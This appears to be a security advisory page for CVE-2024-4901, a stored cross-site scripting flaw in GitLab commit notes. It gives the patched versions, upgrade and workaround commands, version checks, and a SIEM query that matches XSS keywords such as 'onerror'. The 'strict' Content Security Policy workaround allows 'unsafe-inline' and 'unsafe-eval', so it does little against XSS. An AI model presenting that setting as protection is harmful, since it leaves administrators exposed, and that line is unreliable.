CVE-2024-4901
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in GitLab allows attackers to inject malicious JavaScript into commit notes, which then executes in victims' browsers when viewing those commits. This affects GitLab Community Edition and Enterprise Edition users running vulnerable versions. Attackers could steal session cookies, perform actions as the victim, or redirect to malicious sites.
💻 Affected Systems
- GitLab Community Edition
- GitLab Enterprise Edition
📦 What is this software?
Gitlab by Gitlab
GitLab is a complete DevOps platform providing source code management, CI/CD pipelines, security scanning, container registry, and collaboration tools used by millions of developers and thousands of enterprises worldwide. As both a cloud-hosted SaaS offering (GitLab.com) and self-managed software, G...
Learn more about Gitlab →Gitlab by Gitlab
GitLab is a complete DevOps platform providing source code management, CI/CD pipelines, security scanning, container registry, and collaboration tools used by millions of developers and thousands of enterprises worldwide. As both a cloud-hosted SaaS offering (GitLab.com) and self-managed software, G...
Learn more about Gitlab →Gitlab by Gitlab
GitLab is a complete DevOps platform providing source code management, CI/CD pipelines, security scanning, container registry, and collaboration tools used by millions of developers and thousands of enterprises worldwide. As both a cloud-hosted SaaS offering (GitLab.com) and self-managed software, G...
Learn more about Gitlab →Gitlab by Gitlab
GitLab is a complete DevOps platform providing source code management, CI/CD pipelines, security scanning, container registry, and collaboration tools used by millions of developers and thousands of enterprises worldwide. As both a cloud-hosted SaaS offering (GitLab.com) and self-managed software, G...
Learn more about Gitlab →Gitlab by Gitlab
GitLab is a complete DevOps platform providing source code management, CI/CD pipelines, security scanning, container registry, and collaboration tools used by millions of developers and thousands of enterprises worldwide. As both a cloud-hosted SaaS offering (GitLab.com) and self-managed software, G...
Learn more about Gitlab →Gitlab by Gitlab
GitLab is a complete DevOps platform providing source code management, CI/CD pipelines, security scanning, container registry, and collaboration tools used by millions of developers and thousands of enterprises worldwide. As both a cloud-hosted SaaS offering (GitLab.com) and self-managed software, G...
Learn more about Gitlab →⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, gain full control of the GitLab instance, access source code, modify repositories, or deploy malicious code to production environments.
Likely Case
Attackers steal user session cookies to impersonate victims, access private repositories, or modify project settings and content.
If Mitigated
With proper Content Security Policy (CSP) headers and input validation, the impact is limited to the specific user's session scope without privilege escalation.
🎯 Exploit Status
Exploitation requires ability to create or import projects with malicious commit notes. Attack chain involves social engineering or compromised accounts.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 16.11.5, 17.0.3, 17.1.1
Vendor Advisory: https://about.gitlab.com/releases/2024/06/26/security-release-gitlab-16-11-5-released/
Restart Required: Yes
Instructions:
1. Backup your GitLab instance. 2. Update to GitLab 16.11.5, 17.0.3, or 17.1.1 using your package manager. 3. Run 'sudo gitlab-ctl reconfigure'. 4. Run 'sudo gitlab-ctl restart'.
🔧 Temporary Workarounds
Disable project imports
linuxTemporarily disable project import functionality to prevent malicious imports
sudo gitlab-rails runner "ApplicationSetting.current.update!(import_sources: [])"
Enable Content Security Policy
linuxImplement strict CSP headers to mitigate XSS impact
Add to /etc/gitlab/gitlab.rb: nginx['custom_gitlab_server_config'] = "add_header Content-Security-Policy \"default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval';\";"
sudo gitlab-ctl reconfigure
🧯 If You Can't Patch
- Restrict project import permissions to trusted administrators only
- Implement web application firewall (WAF) rules to block XSS payloads in commit notes
🔍 How to Verify
Check if Vulnerable:
Check GitLab version: sudo gitlab-rake gitlab:env:info | grep 'GitLab version'Check Version:
sudo gitlab-rake gitlab:env:info | grep 'GitLab version'Verify Fix Applied:
Verify version is 16.11.5, 17.0.3, or 17.1.1 or higher📡 Detection & Monitoring
Log Indicators:
- Unusual project import activity
- Multiple failed import attempts
- Suspicious commit note patterns in audit logs
Network Indicators:
- Unexpected JavaScript execution in commit views
- External script loading from commit pages
SIEM Query:
source="gitlab" ("project import" OR "commit note") AND ("script" OR "javascript" OR "onload" OR "onerror")